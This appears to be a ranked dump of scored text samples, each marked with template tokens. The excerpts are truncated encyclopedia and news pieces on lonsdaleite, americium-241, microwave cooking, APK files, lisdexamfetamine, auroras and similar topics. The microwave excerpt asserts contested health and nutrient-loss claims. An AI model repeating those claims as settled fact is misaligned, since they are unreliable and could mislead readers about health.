gaze. + +And many did, when the three moons passed, posting their recordings of the triple moon transit on YouTube. + +The moons spin around Jupiter at different speeds; their orbits vary in duration from two to 17 days, so having them line up together to zip across the side of +================================================================================ +Rank = 74; Score = 782336.0 +<|begin_of_text|>Lonsdaleite (named in honour of Kathleen Lonsdale), also called hexagonal diamond in reference to the crystal structure, is an allotrope of carbon with a hexagonal lattice. In nature, it forms when meteorites containing graphite strike the Earth. The great heat and stress of the impact transforms the graphite into diamond, but retains graphite's hexagonal crystal lattice. Lonsdaleite was first identified in 1967 from the Canyon Diablo meteorite, where it occurs as microscopic crystals associated with diamond.[4][5] + +Hexagonal diamond has also been synthesized in the laboratory (1966 or earlier; published in 1967)[6] by compressing and heating graphite either in a static press or using explosives.[7] It has also been produced by chemical vapor deposition,[8][9][10] and also by the thermal decomposition of a polymer, poly(hydridocarbyne), at atmospheric pressure, under argon atmosphere, at 1,000 °C (1,832 °F).[11][12] + +It is translucent, brownish-yellow, and has an index of refraction of 2.40 to 2.41 and a specific gravity of 3.2 to 3.3. Its hardness is theoretically superior to that of cubic diamond (up to 58% more), according to computational simulations, but natural specimens exhibited somewhat lower hardness through a large range of values (from 7 to 8 on Mohs hardness scale). The cause is speculated as being due to the samples having been riddled with lattice defects and impurities.[13] + +The property of lonsdaleite as a discrete material has been questioned, since specimens under crystallographic inspection showed not a bulk hexagonal lattice, but instead cubic diamond dominated by structural defects that include hexagonal sequences.[14] A quantitative analysis of the X-ray diffraction data of lonsdaleite has shown that about equal amounts of hexagonal and cubic stacking sequences are present. Consequently, it has been suggested that "stacking disordered diamond" is the most accurate structural description of lonsdaleite.[15] On the other hand, recent shock experiments with in situ X-ray diffraction show strong evidence for creation of relatively pure lonsdaleite in dynamic high-pressure environments such as meteorite impacts.[16][17]<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 75; Score = 782336.0 +<|begin_of_text|>Americium-241 (241Am) is an isotope of americium. Like all isotopes of americium, it is radioactive. 241Am is the most common isotope of americium. It is the most prevalent isotope of americium in nuclear waste. Americium-241 has a half-life of 432.2 years. It is commonly found in ionization type smoke detectors. It is a potential fuel for long-lifetime radioisotope thermoelectric generators (RTGs). Its common parent nuclides are β− from 241Pu, EC from 241Cm and α from 245Bk. 241Am is fissile and the critical mass of a bare sphere is 57.6-75.6 kilograms and a sphere diameter of 19–21 centimeters.[1] Americium-241 has a specific activity of 3.43 Ci/g (curies per gram or 126.9 gigabequerels (GBq) per gram).[2] It is commonly found in the form of americium-241 dioxide (241AmO 2 ). This isotope also has one meta state; 241mAm, with an excitation energy of 2.2 MeV, and a half-life of 1.23 μs. The presence of americium-241 in plutonium is determined by the original concentration of plutonium-241 and the sample age. Because of the low penetration of alpha radiation, americium-241 only poses a health risk when ingested or inhaled. Older samples of plutonium containing plutonium-241 contain a buildup of 241Am. A chemical removal of americium-241 from reworked plutonium (e.g. during reworking of plutonium pits) may be required in some cases. + +Nucleosynthesis [ edit ] + +Americium-241 has been produced in small quantities in nuclear reactors for decades, and many kilograms of 241Am have been accumulated by now.[3] Nevertheless, since it was first offered for sale in 1962, its price, about US$1,500 per gram of 241Am, remains almost unchanged owing to the very complex separation procedure.[4] + +Americium-241 is not synthesized directly from uranium – the most common reactor material – but from the plutonium isotope 239Pu. The latter needs to be produced first, according to the following nuclear process: + +92 238 U → ( n, γ ) 92 239 U → 23.5 m i +================================================================================ +Rank = 76; Score = 778240.0 +<|begin_of_text|>Microwaving is a simple, convenient cooking option for people on the go. The microwave oven has been a mainstay in the US for 30+ years, virtually transforming society and how we view food. But despite its wonders, the question that’s been avoided remains: are microwaves the healthiest cooking option? The answer is, of course, no, as there are much better options available that will ensure nutrients will remain in your food. + +How Does Microwaving Work? + +Before we dive into the research on the possible effects and safety of microwave ovens, let’s clarify what a microwave is. A microwave is a form of non-ionizing radiation. As a matter of contrast, ionizing radiation changes the electromagnetic nature of atoms, or ionizes them. This alters the way they interact with other atoms and molecules around them. X-rays, gamma radiation, and nuclear medicine (CT scans, barium swallows, and mammograms) are types of ionizing radiation. Your food is being zapped by high-frequency waves of heat, and some people argue that this radiation can be harmful to your health. + +One study by Dr. Hans Hertel explored how microwaves change the molecular structure of food and the effects of that food on the human body. In his study, he found that individuals who consumed the microwaved foods experienced a decrease in HDL cholesterol, a reduced red blood cell count, and fewer white blood cells. Unfortunately, no studies have been conducted since to replicate Dr. Hertel's findings, so it would be reaching to conclude that microwaving does indeed deteriorate health. Still, there are other cooking options that may be far better at retaining the nutritive quality of food. + +The Best Cooking Options for Maintaining Nutrition + +Microwaving cooks the food at very high temperatures in a very short amount of time. This results in a great deal of nutrient loss for most foods, especially vegetables. Our foods are also subjected to nutrient loss when we boil, fry, or roast our food. Boiling vegetables, for example, leeches most of the nutrients (including antioxidants) into the water. The best option for cooking vegetables that will result in only a minor loss of nutrients is steaming. Sautéing and baking at low temperatures is also a viable option that will retain more nutrients than microwaving, boiling, or frying. Of course, by making the majority of your diet raw, with some added dietary fat to help absorb the fat-soluble vitamins (A, D, +================================================================================ +Rank = 77; Score = 778240.0 +<|begin_of_text|>The brain - awake and sleeping - is awash in electrical activity, and not just from the individual pings of single neurons communicating with each other. In fact, the brain is enveloped in countless overlapping electric fields, generated by the neural circuits of scores of communicating neurons. The fields were once thought to be an "epiphenomenon, a 'bug' of sorts, occurring during neural communication," says neuroscientist Costas Anastassiou, a postdoctoral scholar in biology at the California Institute of Technology (Caltech). + +New work by Anastassiou and his colleagues, however, suggests that the fields do much more - and that they may, in fact, represent an additional form of neural communication. + +"In other words," says Anastassiou, the lead author of a paper about the work appearing in the journal Nature Neuroscience, "while active neurons give rise to extracellular fields, the same fields feed back to the neurons and alter their behavior," even though the neurons are not physically connected - a phenomenon known as ephaptic coupling. "So far, neural communication has been thought to occur at localized machines, termed synapses. Our work suggests an additional means of neural communication through the extracellular space independent of synapses." + +Extracellular electric fields exist throughout the living brain, though they are particularly strong and robustly repetitive in specific brain regions such as the hippocampus, which is involved in memory formation, and the neocortex, the area where long-term memories are held. "The perpetual fluctuations of these extracellular fields are the hallmark of the living and behaving brain in all organisms, and their absence is a strong indicator of a deeply comatose, or even dead, brain," Anastassiou explains. + +Previously, neurobiologists assumed that the fields were capable of affecting - and even controlling - neural activity only during severe pathological conditions such as epileptic seizures, which induce very strong fields. Few studies, however, had actually assessed the impact of far weaker - but very common - non-epileptic fields. "The reason is simple," Anastassiou says. "It is very hard to conduct an in vivo experiment in the absence of extracellular fields," to observe what changes when the fields are not around. + +To tease out those effects, Anastassiou and his colleagues, including Caltech neuroscientist Christof Koch, the Lois and Victor Troendle Professor of Cognitive and Behavioral Biology and professor of computation and neural systems, focused on strong but slowly oscillating fields, called local field potentials (L +================================================================================ +Rank = 78; Score = 774144.0 +<|begin_of_text|>A giant blob of gas and dust far off in the universe mysteriously glows bright green, and astronomers have finally figured out why. Two huge galaxies were observed in the blob's core, and they're surrounded by a swarm of smaller galaxies in what appears to be the birth of a massive cluster of galaxies. + +Astronomers spotted the blob's central galaxies using the Atacama Large Millimeter/submillimeter Array (ALMA) and the Very Large Telescope at the European Southern Observatory in Chile. The glowing space blob was first discovered in 2000, and the source of its light has been a mystery ever since. Scientists created this video to zoom in on the space blob and reveal its inner galaxies. + +One study published in 2011 suggested that polarized light emitted by the blob could have come from hidden galaxies. The new observations with ALMA and VLT allowed researchers to pinpoint two big galaxies as the sources of this light. [See Amazing Photos of the Very Large Telescope] + +Further observations by the Hubble Space Telescope and the Keck Observatory in Hawaii revealed the swarm of small, faint galaxies surrounding the bigger two in the heart of the blob. Here, galaxies are forming stars at 100 times the rate of the Milky Way. + +A giant green "space blob" - called the Lyman-alpha blob LAB-1 - is seen in this composite of two different images taken by the Very Large Telescope in Chile. The LAB-1 space blob is 300,000 light-years across, making it one of the largest known single objects in the universe. Credit: ESO/M. Hayes + +"For a long time, the origin of the extended Lyman-alpha light has been controversial," Jim Geach, the study's lead author, said in a statement. "But with the combination of new observations and cutting-edge simulations, we think we have solved a 15-year-old mystery." + +So-called "Lyman-alpha blobs" are some of the biggest things in space. This particular space blob, named SSA22-Lyman-alpha Blob 1 (LAB-1), is the largest of its kind. It measures about 300,000 light-years across, or three times the size of the Milky Way galaxy. + +LAB-1 is located 11.5 billion light-years from Earth, so the light we observe from it is almost as old as the universe (13.8 billion years). This means that looking at LAB-1 provides a window into the early history of the universe. + +Lyman-alpha blobs consist mainly of hydrogen gas and +================================================================================ +Rank = 79; Score = 770048.0 +<|begin_of_text|>APK Files + +All Android apps are deployed and contained in so called APK files. APK files are really just ZIP archives that contain a few mandatory folders and metadata files in addition to the application binary and application resource files such as images, XML layout files, arbitrary binary data, etc. + +Good And Folly + +APK files are a good medium for distributing Android apps as they cram the myriad pieces of an app into one convenient archive which is easy to copy and distribute. The APK folly is that installed apps are never extracted from the archive and placed in a simple folder. Instead they are kept in the archive. + +Why + +Ok, so you ask why is keeping installed apps in APK files an incredibly foolish design choice? Simply, because it requires all code that accesses a resource file to deal specially with the APK file format. + +This may not seem like much of an issue since the SDK provides a couple of mechanisms to use and access resources. Nearly all classes that use resource files accept resource IDs defined in the auto-generated R.java file and the SDK takes care of loading the resources for you. Even better, there is the Resources class for accessing resources directly by obtaining InputStream instances to them and even AssetFileDescriptors for them. + +These mechanism don’t really solve the problem. In the first instance, the SDK is simply hiding the underlying problem by accepting the resource IDs and accessing the APK file behind the scenes. Obviously, the SDK still has special code to extract resources from the APK file. Special code that exists only for specific file types (images, XML layouts, etc.) explicitly handled by the SDK in this way. + +The second instance is not really a solution, it is a manifestation of the problem. The resource files are buried in the APK file and we need the Resources class to access them. All the standard methods of opening a file, in Java or native C, are useless. You can’t use new FileInputStream() in Java or open() a file in C. We need special code that is aware of the APK format and uses the designated APIs to extract files from it. + +At least in theory. In practice the Resources class does not provide a real solution for accessing APK resource files from C. There is an extremely convoluted method of obtaining the APK’s file descriptor in Java from an undocumented member of an AssetFileDescriptor instance, obtaining the offset and length of the resource in the APK file and passing the triplet through JNI. You can read about it here. The alternative is to compile your native code with libzip support and to process the APK file yourself +================================================================================ +Rank = 80; Score = 761856.0 +<|begin_of_text|>It sounds a little bit like one of the subplots in Avatar, where we discover that the moon Pandora possesses a kind of mega-consciousness created by bio-electrical circuitry. But this is actually real. Two years ago, researchers discovered a strange electro-chemical signature in the sludge at the bottom of Aarhus Bay in Denmark. Now, they've discovered what was causing it: a vast network of bacteria that form electrical connections with each other, almost like nerve cells in the brain. + +Above, you can see what you might call tiny electrical wires that connect each bacterial cell, under an electron microscope. The wires are blue, and they are running through a piece of sediment, or sand from the seafloor. + +Advertisement + +Over at Wired Science, Brandon Keim explains: + +The bacteria were first detected in 2010 by researchers perplexed at chemical fluctuations in sediments from the bottom of Aarhus Bay... Almost instantaneously linking changing oxygen levels in water with reactions in mud nearly an inch below, the fluctuations occurred too fast to be explained by chemistry. Only an electrical signal made sense — but no known bacteria could transmit electricity across such comparatively vast distances. Were bacteria the size of humans, the signals would be making a journey 12 miles long. Now the mysterious bacteria have been identified. They belong to a microbial family called Desulfobulbaceae, though they share just 92 percent of their genes with any previously known member of that family. They deserve to be considered a new genus, the study of which could open a new scientific frontier for understanding the interface of biology, geology and chemistry across the undersea world. + +Advertisement + +Even more incredible, it turns out these bacteria are found all over the world, their tiny electrical cables woven deeply into the mud of the ocean bottom. Keim writes that the scientists found "a full half-mile of Desulfobulbacea cable" in one teaspoonful of mud. + +In other words, the entire ocean bed may be electrified in the same way our nervous systems are. They're networks of individual cells connected by electro-chemical signals — essentially they are an enormous multi-cellular organism. These bacteria "breathe" by absorbing oxygen and hydrogen sulfide, emitting water as a byproduct. They might be serving as a vast water purification system on the ocean bottom, or they might be part of a geological process that's a lot more complex. We also have no way of knowing how other sea creatures are interacting with this giant electrical grid organism. + +Advertisement + +What +================================================================================ +Rank = 81; Score = 753664.0 +<|begin_of_text|>Einstein's'spooky action' common in large quantum systems + +by Staff Writers + +Cleveland OH (SPX) May 29, 2013 + +Entanglement is a property in quantum mechanics that seemed so unbelievable and so lacking in detail that, 66 years ago this spring, Einstein called it "spooky action at a distance." + +But a mathematician at Case Western Reserve University and two of his recent PhD graduates show entanglement is actually prevalent in large quantum systems and have identified the threshold at which it occurs. + +The finding holds promise for the ongoing push to understand and take advantage of the property. If harnessed, entanglement could yield super high-speed communications, hack-proof encryptions and quantum computers so fast and powerful they would make today's supercomputers look like adding machines in comparison. + +The mathematicians don't tell us how entanglement works, but were able to put parameters on the property by combining math concepts developed for a number of different applications during the last five decades. In a nutshell, the researchers connected the math to properties of quantum mechanics-the otherworldly rules that best apply to atomic and subatomic particles-to describe physical reality. + +"There have been indications that large subgroups within quantum systems are entangled," said Stanislaw Szarek, mathematics professor at Case Western Reserve and an author of the study. "Our contribution is to find out exactly when entanglement becomes ubiquitous." + +Szarek worked with Guillaume Aubrun, assistant professor of mathematics at Universite Claude Bernard Lyon 1, France, and Deping Ye, assistant professor of mathematics and statistics at Memorial University of Newfoundland, Canada. Their work is published online in the Early View section of Communications on Pure and Applied Mathematics. + +The behaviors of materials down at the level of atoms are often strange, but entanglement borders on our concepts of sorcery. For example, if two electrons spinning in opposite directions are entangled, when one changes direction, the other immediately changes, whether the electrons are side by side, across the room or at opposite ends of the universe. + +Other particles, such as photons, atoms and molecules, can also become entangled, but taking advantage of the property requires more than a pair or handful. + +Szarek, Aubrun and Ye focused on large quantum systems-large groups of particles that have the potential for use in our world. + +They found that, in systems in a random state, two subsystems that are each less than one-fifth of the whole are generally not entangled. Two +================================================================================ +Rank = 82; Score = 745472.0 +<|begin_of_text|>Germany (German: Deutschland), officially the Federal Republic of Germany (German: Bundesrepublik Deutschland), is a country in Central Europe. + +The first modern unified state in German history was the German Empire, founded in 1871 by Wilhelm I, King of Prussia. The country was a member of the Central Powers during World War I alongside Austro-Hungarian Empire and the Ottoman Empire. However, as their war effort collapsed in 1918, the empire fell to civil conflicts, resulting in the abdication of Emperor Wilhelm II and the end of the German Empire. The Weimar Republic that succeeded the empire carried the burdens of the war in the years that followed. + +Probably one of the most infamous eras of German history was the fascist Nazi regime of the Third Reich or Nazi Germany. In 1933, Adolf Hitler and his Nazi Party came to power within the Weimar Republic, and soon seized all power from the democratic Reichstag. In the years that followed, Hitler built an enormous and zealous army and annexed neighboring countries, including Austria and Czechoslovakia. On September 1, 1939, Nazi Germany invaded Poland, prompting a declaration of war from France and the United Kingdom, sparking World War II. + +Contents show] + +Armed Forces Edit + +Military Branches Edit + +These are the military branches of the German Empire: + +Seal/Flag Branch The Imperial German Army was the combined land and air forces of the German Empire. The Imperial German Navy was the naval force of the German Empire. + +These are the military branches of Nazi Germany: + +Emblem Branch The Wehrmacht is the primary military force of the Nazi Germany. It is divided into the Heer (army), the Luftwaffe (air force) and the Kriegsmarine (navy). The German Elite Forces represent an unspecified elite unit of the Third Reich's Wehrmacht, taking cues from the real life Fallschirmjäger and Waffen-SS units. The Afrika Korps was Germany's expeditionary force to North Africa between February 12, 1941 to May 13, 1943. + +These are the military branches of the Federal Republic of Germany: + +Emblem Branch In modern times, Germany's armed forces are called the Bundeswehr (Federal Defense) and serve alongside other NATO forces around the world. + +Military Organizations Edit + +Germany is a part of both NATO and the European Union, both of which are featured as factions in their own rights in the Battlefield series. Germany is therefore presumably +================================================================================ +Rank = 83; Score = 745472.0 +<|begin_of_text|>One of the two big players in the asteroid mining market, Deep Space Industries, today unveiled its plan to land a 110-pound spacecraft on a near-Earth asteroid by 2020. + +The spacecraft, known as Prospector-1, would study the yet-to-be-selected asteroid to determine the value of its resources for mining. It’ll also put Deep Space Industries’ water-based propulsion system to an interplanetary test. + +“Deep Space Industries has worked diligently to get to this point, and now we can say with confidence that we have the right technology, the right team and the right plan to execute this historic mission,” Rick Tumlinson, DSI’s board chairman and co-founder, said in a news release. + +California-based DSI and its partners in Luxembourg say they’ll launch a precursor satellite called Prospector-X into low Earth orbit next year to test the technologies that would be used for Prospector-1. + +DSI sees near-Earth asteroids as potentially valuable sources for materials ranging from plain old water ice – which can be processed into breathable oxygen and drinkable water as well as propellant – to in-space building materials and precious metals. + +If DSI sticks to its schedule, Prospector-1 could become the first commercial asteroid mining exploration mission. However, Planetary Resources, which is based in Redmond, Wash., is also taking aim at asteroids. + +Planetary Resources had its first precursor spacecraft, Arkyd-3R, deployed into orbit for a five-month test mission last year. A larger spacecraft, the Arkyd-6A, is being readied for launch later this year and will observe Earth in infrared wavelengths as a practice round for asteroid prospecting. + +Planetary Resources says its next-generation space telescopes, known as the Arkyd 100 and Arkyd 200, could start studying the composition of near-Earth asteroids in the 2017-2019 time frame. At the same time, the company plans to create a constellation of Earth-observing satellites known as Ceres. + +If suitable targets are identified, Planetary Resources could begin extracting materials from asteroids by the mid-2020s, according to the company’s president and CEO, Chris Lewicki. + +Planetary Resources has raised tens of millions of dollars since its founding in 2012. Deep Space Industries was founded a year later, and has raised an undisclosed amount of seed money from investors including Metatron Global. Both companies have forged partnerships with Luxembourg’s government as part of that European nation’s SpaceResources.lu initiative +================================================================================ +Rank = 84; Score = 741376.0 +<|begin_of_text|>Not to be confused with Levoamphetamine + +30mg Vyvanse capsules + +Lisdexamfetamine (contracted from L -lysine-dextroamphetamine), sold under the brand name Vyvanse amongst others, is a substituted amphetamine and an inactive prodrug of the central nervous system (CNS) stimulant dextroamphetamine that is used in the treatment of attention deficit hyperactivity disorder (ADHD) and binge eating disorder.[6][7] Its chemical structure consists of dextroamphetamine coupled with the essential amino acid L -lysine. Lisdexamfetamine itself is inactive prior to its absorption and the subsequent rate-limited enzymatic cleavage of the molecule's L -lysine portion, which produces the active metabolite (dextroamphetamine). + +Lisdexamfetamine can be prescribed for the treatment of attention deficit hyperactivity disorder (ADHD) in adults and children six and older, as well as for moderate to severe binge eating disorder in adults.[6] The safety and the efficacy of lisdexamfetamine dimesylate in children with ADHD three to five years old have not been established.[8] + +Lisdexamfetamine is a Class B/Schedule II substance in the United Kingdom and a Schedule II controlled substance in the United States (DEA number 1205)[9] and the aggregate production quota for 2016 in the United States is 29,750 kilograms of anhydrous acid or base.[10] In 2016, it was the 99th most prescribed medication in the United States, with more than 7 million prescriptions.[11] + +Uses [ edit ] + +Medical [ edit ] + +Part of this section is transcluded from Amphetamine + +Lisdexamfetamine is used primarily as a treatment for attention deficit hyperactivity disorder (ADHD) and binge eating disorder;[6] it has similar off-label uses as those of other pharmaceutical amphetamines.[1][2] Individuals over the age of 65 were not commonly tested in clinical trials of lisdexamfetamine for ADHD.[6]Long-term amphetamine exposure at sufficiently high doses in some animal species is known to produce abnormal dopamine system development or nerve damage,[12][13] but, in humans with ADHD, pharmaceutical amphetamines appear to improve brain development and nerve growth.[14][15][16] Reviews of magnetic resonance imaging (MRI) studies suggest that long-term treatment with amphetamine decreases abnormalities in brain structure and function found in subjects with ADHD, and improves function in +================================================================================ +Rank = 85; Score = 733184.0 +<|begin_of_text|>Caffeine is one of the most commonly used drugs that we using in the manufacturing of sports supplements, here is some additional information about this wonder drug. + +Did you know caffeine is the world’s most favourite and most consumed drug? Caffeine is derived from seeds, leaves, and nuts from several plants. This includes the Coffea plant, whose seeds are harvested to produce coffee. + +In its purest state, caffeine appears as white crystal granules. But unlike other drugs, the use of caffeine goes unregulated since it is safe for regular consumption. + +How Caffeine Works + +As soon as you wake up, adenosine levels start to build up, which cause mental and physical weariness. By drinking a cup of freshly brewed coffee, you can combat drowsiness, sharpen mental performance, and maximize your energy levels. + +As when you consume coffee, the caffeine in it gets broken down into smaller compounds, which are transported into the bloodstream. + +The caffeine in coffee then works by minimizing the effects of adenosine, which is a neurotransmitter. Caffeine helps connect adenosine receptors within your brains without triggering them. + +List of Foods Containing Caffeine + +Caffeine is derived from cocoa seeds, coffee beans, and kola nuts. Hence, any product that has any of the three surely has caffeine. This includes the following foods: + +1. Chocolate + +If you want an instant energy boost, not to mention a mood lifter, munch some chocolate. Chocolate is derived from cocoa beans; hence, it is no surprise as to why it is listed as the number 1 caffeinated food. + +A plain 162 g. chocolate bar alone can supply roughly 70 mg. of caffeine. However, the caffeine content of each chocolate bar or candy varies according to its formula. To ensure your chocolate bar packs enough caffeine, choose dark chocolate. + +2. Chocolate mousse + +A few scoops of chocolate mousse or pudding supplies roughly 10 mg. of caffeine, which is enough to keep you awake to do your homework. + +3. Ice cream and smoothies + +A coffee-flavoured smoothie or ice cream packs 125 mg. of caffeine per serving. Even frozen desserts in mocha varieties can supply 45 mg. of caffeine per cup. + +4. Coffee and chocolate-flavoured snacks + +Chocolate chip cookies, cereals, and any other snack that is coffee or chocolate-flavoured contain a small amount of caffeine. This includes Quaker’s Cocoa Blasts, which supply 11 mg of caffeine per serving +================================================================================ +Rank = 86; Score = 720896.0 +<|begin_of_text|>For other people named Henry Cavendish, see Henry Cavendish (disambiguation) + +Henry Cavendish FRS (; 10 October 1731 – 24 February 1810) was an English natural philosopher, scientist, and an important experimental and theoretical chemist and physicist. He is noted for his discovery of hydrogen, which he termed "inflammable air".[1] He described the density of inflammable air, which formed water on combustion, in a 1766 paper, On Factitious Airs. Antoine Lavoisier later reproduced Cavendish's experiment and gave the element its name. + +A notoriously shy man (it has been postulated that he had what is now called childhood autism in the ICD-10),[2] Cavendish was nonetheless distinguished for great accuracy and precision in his researches into the composition of atmospheric air, the properties of different gases, the synthesis of water, the law governing electrical attraction and repulsion, a mechanical theory of heat, and calculations of the density (and hence the mass) of the Earth. His experiment to measure the density of the Earth has come to be known as the Cavendish experiment. + +Biography [ edit ] + +Early life [ edit ] + +Henry Cavendish was born on 10 October 1731 in Nice, where his family was living at the time. His mother was Lady Anne de Grey, fourth daughter of Henry Grey, 1st Duke of Kent, and his father was Lord Charles Cavendish, the third son of William Cavendish, 2nd Duke of Devonshire. The family traced its lineage across eight centuries to Norman times, and was closely connected to many aristocratic families of Great Britain. Henry's mother died in 1733, three months after the birth of her second son, Frederick, and shortly before Henry's second birthday, leaving Lord Charles Cavendish to bring up his two sons. + +From the age of 11 Henry attended Newcome's School, a private school near London. At the age of 18 (on 24 November 1748) he entered the University of Cambridge in St Peter's College, now known as Peterhouse, but left three years later on 23 February 1751 without taking a degree (at the time, a common practice).[3][4] He then lived with his father in London, where he soon had his own laboratory. + +Lord Charles Cavendish spent his life firstly in politics and then increasingly in science, especially in the Royal Society +================================================================================ +Rank = 87; Score = 716800.0 +<|begin_of_text|>Supply and demand is perhaps one of the most fundamental concepts of economics and it is the backbone of a market economy. Demand refers to how much (quantity) of a product or service is desired by buyers. The quantity demanded is the amount of a product people are willing to buy at a certain price; the relationship between price and quantity demanded is known as the demand relationship. Supply represents how much the market can offer. The quantity supplied refers to the amount of a certain good producers are willing to supply when receiving a certain price. The correlation between price and how much of a good or service is supplied to the market is known as the supply relationship. Price, therefore, is a reflection of supply and demand. + +The relationship between demand and supply underlie the forces behind the allocation of resources. In market economy theories, demand and supply theory will allocate resources in the most efficient way possible. How? Let us take a closer look at the law of demand and the law of supply. + +A. The Law of Demand + +The law of demand states that, if all other factors remain equal, the higher the price of a good, the less people will demand that good. In other words, the higher the price, the lower the quantity demanded. The amount of a good that buyers purchase at a higher price is less because as the price of a good goes up, so does the opportunity cost of buying that good. As a result, people will naturally avoid buying a product that will force them to forgo the consumption of something else they value more. The chart below shows that the curve is a downward slope. + +A, B and C are points on the demand curve. Each point on the curve reflects a direct correlation between quantity demanded (Q) and price (P). So, at point A, the quantity demanded will be Q1 and the price will be P1, and so on. The demand relationship curve illustrates the negative relationship between price and quantity demanded. The higher the price of a good the lower the quantity demanded (A), and the lower the price, the more the good will be in demand (C). + +B. The Law of Supply + +Like the law of demand, the law of supply demonstrates the quantities that will be sold at a certain price. But unlike the law of demand, the supply relationship shows an upward slope. This means that the higher the price, the higher the quantity supplied. Producers supply more at a higher price because selling a higher quantity at a higher price increases revenue. + +A, B and C are points on the supply +================================================================================ +Rank = 88; Score = 716800.0 +<|begin_of_text|>Pope Francis, in his apostolic exhortation, levied charges against free market capitalism, denying that “economic growth, encouraged by a free market, will inevitably succeed in bringing about greater justice and inclusiveness in the world” and concluding that “this opinion … has never been confirmed by the facts.” He went on to label unfettered capitalism as “a new tyranny.” Let’s look at the pope’s tragic vision. + +First, I acknowledge that capitalism fails miserably when compared with heaven or a utopia. Any earthly system is going to come up short in such a comparison. However, mankind must make choices among alternative economic systems that actually exist on earth. For the common man, capitalism is superior to any system yet devised to deal with his everyday needs and desires. + +Capitalism is relatively new in human history. Prior to capitalism, the way people amassed great wealth was by looting, plundering and enslaving their fellow man. With the rise of capitalism, it became possible to amass great wealth by serving and pleasing your fellow man. Capitalists seek to discover what people want and produce and market it as efficiently as possible as a means to profit. A couple of examples would be J.D. Rockefeller, whose successful marketing drove kerosene prices down from 58 cents a gallon in 1865 to 7 cents in 1900. Henry Ford became rich by producing cars for the common man. Both Ford’s and Rockefeller’s personal benefits pale in comparison with that received by the common man by having cheaper kerosene and cheaper transportation. There are literally thousands of examples of how mankind’s life has been made better by those in the pursuit of profits. Here’s my question to you: Are people who, by their actions, created unprecedented convenience, longer life expectancy and a more pleasant life for the ordinary person — and became wealthy in the process — deserving of all the scorn and ridicule heaped upon them by intellectuals, politicians and now the pope? + +Let’s examine the role of profits but first put it in perspective in terms of magnitude. Between 1960 and 2012, after-tax corporate profit averaged a bit over 6 percent of the gross domestic product, while wages averaged 47 percent of the GDP. Far more important than simple statistics about the magnitude of profits is its role in guiding resources to their highest-valued uses and satisfying people. Try polling people with a few questions. Ask them what services they are more satisfied with and what they are less satisfied with. On the “more satisfied” list would be +================================================================================ +Rank = 89; Score = 716800.0 +<|begin_of_text|>The English Wikipedia has reached 5,000,000 articles with Persoonia terminalis (a type of shrub), created by Australian contributor Cas Liber on 1 November 2015 at 12:27 UTC. + +Imagine a world in which every single person on the planet is given free access to the sum of all human knowledge. That's what we're doing. Jimmy Wales, co-founder + +Video + +Wikipedia was founded in 2001 as a project to build an online, free-access, free-content encyclopedia entirely from scratch. Since then, it has grown to be the largest encyclopedia ever created, comprising more than five million articles in English, while still relying on the contributions of volunteers. The English Wikipedia community thanks the millions of users whose edits over the past fourteen-plus years have made this remarkable accomplishment possible. + +A brief history + +Wikipedia officially launched on 15 January 2001, with Jimmy Wales and Larry Sanger as its leaders, on a single computer server as the successor to Nupedia. Its first major mainstream media coverage was in The New York Times on 20 September 2001. In the first year of its existence, more than 20,000 encyclopedia entries were created – a rate exceeding 1,500 articles per month. Today, there are Wikipedia editions in more than 200 languages, accompanied by a dozen additional free-content projects, such as Wikimedia Commons. In March 2006, the English Wikipedia reached one million articles. According to Alexa, Wikipedia is currently the world's sixth most popular website, receiving approximately eight billion pageviews per month. We reached five million articles on 1 November 2015. + +A work in progress + +While Wikipedia is an incredible success, it remains a work in progress. There are still great gaps in its coverage with millions of important topics missing from its pages. Many articles – even vital ones – are not yet considered high-quality. Of our 5,810,435 articles, only a few tens of thousands have passed a vetting process for good or featured status, and more than half are short stubs or start-class articles. There are also more than 200 non-English-language editions of Wikipedia that need volunteers. In other words, there is still much work to be done – and you can help! + +How you can help + +Video of Wikipedians from around the world who contribute to a variety of Wikipedia's language editions + +Wikipedia is written by the people who use it. Anyone, regardless of background, can contribute to building the encyclopedia. You +================================================================================ +Rank = 90; Score = 704512.0 +<|begin_of_text|>Thanks to data collected by ESA’s Cluster spacecraft and a NASA mission called the Imager for Magnetopause-to-Aurora Global Exploration (IMAGE), scientists have solved a long-standing space mystery – the origin of a colorful display in the night sky known as the theta aurora. + +Auroras are the most visible manifestation of the Sun’s effect on Earth. + +They are caused by the solar wind, a stream of plasma – electrically charged atomic particles – carrying its own magnetic field, interacting with the magnetic field of our planet. + +Normally, the main region for this impressive display is the ‘auroral oval’, which lies at around 65-70 degrees north or south of the equator, encircling the polar caps. + +However, auroras can occur at even higher latitudes. One type is known as a theta aurora because seen from above it looks like the Greek letter Θ (theta) – an oval with a line crossing through the center. + +While the genesis of the auroral oval emissions is reasonably well understood, the origin of the theta aurora was unclear until now. + +The new study, published in the journal Science, shows that hot plasma funneled into near-Earth space from the Sun helps cause these unique aurora. + +“Previously it was unclear whether this hot plasma was a result of direct solar wind entry through the lobes of the magnetosphere, or if the plasma is somehow related to the plasma sheet on the night side of Earth,” said study lead author Dr Robert Fear of the University of Southampton. + +“The possibilities have been debated since the first satellite observations of the phenomenon were made in the 1980s.” + +The mystery was finally solved by studying data collected simultaneously by the IMAGE satellite and Cluster’s PEACE electron spectrometer instruments on September 15, 2005. + +While the four Cluster satellites were located in the southern hemisphere magnetic lobe, IMAGE had a wide-field view of the southern hemisphere aurora. + +As one Cluster satellite observed uncharacteristically energetic plasma in the lobe, IMAGE saw the ‘arc’ of the theta aurora cross the magnetic footprint of Cluster. + +“We found that the energetic plasma signatures occur on high-latitude magnetic field lines that have been closed by the process of magnetic reconnection, which then causes the plasma to become relatively hot,” Dr Fear explained. + +“Because the field lines are closed, the observations are incompatible with direct entry from the solar wind.” + +“By testing this and other predictions about the behavior of the theta aurora, our observations provide strong evidence that the plasma trapping mechanism is responsible for +================================================================================ +Rank = 91; Score = 696320.0 +<|begin_of_text|>-Fixed a bug that caused small dogs to start barking and never stop. + +-Small dogs are no longer 